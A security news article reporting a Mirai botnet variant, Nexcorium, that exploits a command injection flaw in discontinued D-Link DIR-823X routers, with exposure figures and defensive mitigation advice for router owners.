Mirai Variant Nexcorium Targets D-Link Router Vulnerability
Security researchers discovered a new Mirai botnet campaign on April 22, 2026, actively exploiting CVE-2025-29635, a high-severity command injection vulnerability in D-Link DIR-823X routers. The malware variant, dubbed Nexcorium, leverages this flaw to execute arbitrary commands on vulnerable devices and recruit them into a growing botnet infrastructure.
CVE-2025-29635 affects the web management interface of D-Link DIR-823X routers through improper input validation in the device's firmware. Attackers can inject malicious commands through specially crafted HTTP requests to the router's administrative panel without requiring authentication. The vulnerability stems from insufficient sanitization of user input in the router's CGI scripts, allowing remote code execution with root privileges.
The Nexcorium campaign was first identified by threat intelligence researchers monitoring botnet activity across compromised IoT devices. The Hacker News reported that the attackers are systematically scanning internet-facing D-Link routers and attempting exploitation within minutes of discovery. The malware downloads additional payloads from command-and-control servers, establishing persistent access and enabling the infected devices to participate in distributed denial-of-service attacks.
Unlike traditional Mirai variants that rely on weak default credentials, Nexcorium specifically targets this command injection flaw to bypass authentication entirely. The attack vector involves sending POST requests to the router's web interface with embedded shell commands in parameter fields. Once successful, the malware installs itself in the device's temporary filesystem and establishes communication with remote servers for further instructions.
Security firm researchers noted that the campaign shows sophisticated understanding of the D-Link firmware architecture, suggesting the threat actors have reverse-engineered the router's software to optimize their exploitation techniques. The malware includes anti-analysis features and attempts to disable other competing botnet infections on compromised devices.
D-Link DIR-823X Router Users Face Critical Exposure
The vulnerability affects all D-Link DIR-823X router models running firmware versions prior to the device's end-of-life designation. D-Link discontinued support for the DIR-823X series in 2024, meaning no security patches will be released to address CVE-2025-29635. Home users, small businesses, and organizations still operating these routers remain vulnerable to immediate compromise.
Shodan internet scanning data indicates approximately 180,000 D-Link DIR-823X routers remain accessible from the internet worldwide, with the highest concentrations in North America, Europe, and Asia-Pacific regions. Many of these devices retain default administrative credentials and lack proper firewall configurations, making them prime targets for the Nexcorium campaign.
The command injection vulnerability carries a CVSS score of 8.1, classified as high severity due to its network-based attack vector and the potential for complete device compromise. Successful exploitation grants attackers root-level access to the router's operating system, enabling them to monitor network traffic, redirect DNS queries, and use the device as a launching point for attacks against other network resources.
Enterprise environments using D-Link DIR-823X routers in branch offices or as backup connectivity solutions face particular risk, as compromised devices can provide attackers with persistent network access and the ability to pivot to internal systems. The botnet recruitment process typically occurs within hours of initial compromise, making rapid response critical for affected organizations.
Immediate Mitigation Steps for D-Link Router Owners
Organizations and users operating D-Link DIR-823X routers must take immediate action to prevent compromise, as no firmware patch will be released for these discontinued devices. The most effective mitigation is complete replacement with supported router models from current vendor product lines. SecurityWeek recommends prioritizing router replacement within 30 days for internet-facing deployments.
For environments where immediate replacement isn't feasible, administrators should implement network-level protections to reduce exposure. Disable remote management features by accessing the router's web interface at 192.168.1.1 and navigating to Advanced Settings > Remote Management. Set the "Enable Remote Management" option to "Disabled" and ensure the "Remote Management Port" is not accessible from external networks.
Network administrators should also configure firewall rules to block external access to the router's web management interface on ports 80 and 443. Change default administrative credentials immediately, using complex passwords with at least 12 characters combining uppercase, lowercase, numbers, and special characters. Enable access logging if available and monitor for suspicious authentication attempts or configuration changes.
For detection purposes, security teams should scan their networks for D-Link DIR-823X devices using network discovery tools and maintain an inventory of all internet-facing router infrastructure. Help Net Security suggests implementing network segmentation to isolate potentially vulnerable IoT devices from critical business systems and monitoring network traffic for indicators of botnet communication patterns.
